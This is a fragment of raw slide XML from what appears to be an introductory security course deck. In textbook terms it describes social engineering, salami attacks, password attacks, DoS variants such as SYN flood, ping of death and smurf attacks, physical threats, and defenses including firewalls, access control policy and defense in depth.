            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>More advanced method of gaining illicit information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way around.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Integrity Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="2057400"/>
            <a:ext cx="6505200" cy="35143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Integrity Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180"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Salami attack</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This is a collection of small attacks that result in a larger attack when combined.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Example, if an attacker had a collection of stolen credit card numbers, he could withdraw small amounts of money from each credit card (possibly unnoticed by the credit card holders). Although each withdrawal is small, they add up to a significant sum for the attacker.</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Integrity Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182"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C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Password attack</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Trojan horse</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Packet capture</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Key logger</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Brute force attack</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Dictionary attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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84" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="438840" indent="-319680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Denial of service (DoS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="Picture 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="2362320"/>
            <a:ext cx="6771960" cy="2525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8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Distributed denial of service (DDoS)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DDoS attacks can increase the amount of traffic flooded to a target system.</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Zombies.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89"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TCP SYN flood</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One variant of a DoS attack is for an attacker to initiate multiple TCP sessions by sending SYN segments but never completing the three-way handshake.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Because many servers limit the number of TCP sessions they can have open simultaneously, a SYN flood can render a target system incapable of opening a TCP session with a legitimate user.</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91"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ICMP attacks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ICMP DoS attack variant called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the ping of death</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>” uses ICMP packets that are too big.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Sends ICMP traffic as a series of fragments in an attempt to overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the fragment reassembly buffers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>on the target device.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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Smurf attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>can use ICMP traffic directed to a subnet to flood a target system with ping replies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pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066680" y="1828800"/>
            <a:ext cx="6781320" cy="422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609600" y="206880"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752480"/>
            <a:ext cx="8686800" cy="480072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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Passwords management.</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Identification and authentication techniques.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Password types.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Password attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Web penetration attacks.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Software bugs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Web applications attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL Injection, Remote execution, and Cross-site scripting..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Mechanisms to protect web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Lab : SQL injection, XSS, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> tool.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3585056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95"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C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Electrical disturbances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Power fault: A brief electrical outage</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Blackout: An extended electrical outage</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Availability Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19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Attacks on a system’s physical environment</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Temperature</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Gas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85800" y="1197000"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Security Mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3581280"/>
            <a:ext cx="6400440" cy="1752120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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4666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IDS/IPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cryptography</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Defense in Depth </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20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 single access control mechanism is ever deployed on its own.</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Multiple layers or levels of access controls are deployed to provide layered security or defense in depth.</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Any layer of protection might fail</a:t>
            </a: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 Defense in Depth Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1523880"/>
            <a:ext cx="6781320" cy="4968360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="936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685800" y="1197000"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:u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Access Control Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20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It is the corporate policy which states what type of access is allowed across the organization’s network</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Example</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Our internal users can access Internet Web sites and FTP sites or send SMTP mail, but we only allow inbound SMTP mail from the internet to our internal users” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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 clearly defined access control policy helps to select the correct firewall product</a:t>
            </a:r>
          </a:p>
          <a:p>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Access Control Descriptors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209"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Direction	</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Inbound or outbound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Service</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HTTP, FTP …etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Specific host</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Time of day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What is a firewall?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1600200"/>
            <a:ext cx="7772040" cy="45302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 firewall is a system that enforces the access control policy</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Main purpose</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To control access to or from a protected network .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It implements a network access policy by forcing connections to pass through the firewall, where they can be examined and evaluated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
